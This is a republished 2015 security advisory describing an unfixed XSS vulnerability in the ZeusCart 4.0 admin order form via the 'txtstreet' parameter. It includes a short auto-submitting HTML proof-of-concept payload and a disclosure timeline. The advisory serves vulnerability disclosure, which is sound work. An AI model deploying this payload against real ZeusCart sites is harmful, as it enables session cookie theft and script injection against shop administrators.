Lucene search
K

ZeusCart 4.0 Cross Site Scripting

🗓️ 16 Sep 2015 00:00:00Reported by Tim CoenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

ZeusCart 4.0 XSS vulnerability via "txtstreet" parameter allows cookie theft and JavaScript injectio

Code
`ZeusCart 4.0: XSS  
Security Advisory – Curesec Research Team  
1. Introduction  
  
Affected Product: ZeusCart 4.0   
Fixed in: not fixed  
Fixed Version Link: n/a   
Vendor Contact: [email protected]   
Vulnerability Type: XSS   
Remote Exploitable: Yes   
Reported to vendor: 08/13/2015   
Disclosed to public: 09/14/2015   
Release mode: Full Disclosure   
CVE: n/a   
Credits Tim Coen of Curesec GmbH   
  
2. Vulnerability Description  
  
There is an XSS vulnerability via the "txtstreet" POST parameter when  
adding a new order. With this, it is possible to steal cookies or inject  
JavaScript keyloggers.  
2. Proof of Concept  
  
  
<form name="myform" method="post"  
action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create"  
>  
<input type="hidden" name="hidOrderTotal" value="400">  
<input type="hidden" name="discount" value="flat">  
<input type="hidden" name="selCustomer" value="1">  
<input type="hidden" name="payOption" value="8">  
<input type="hidden" name="txtname" value="Primary">  
<input type="hidden" name="txtstreet" value="foo autofocus  
onfocus=alert(1); bar">  
</form>  
<script>document.myform.submit();</script>  
  
4. Solution  
  
This issue was not fixed by the vendor.  
  
5. Report Timeline  
  
08/13/2015 Informed Vendor about Issue (no reply)  
09/07/2015 Reminded Vendor of release date (no reply)  
09/14/2015 Disclosed to public  
  
6. Blog Reference:  
http://blog.curesec.com/article/blog/ZeusCart-40-XSS-55.html  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation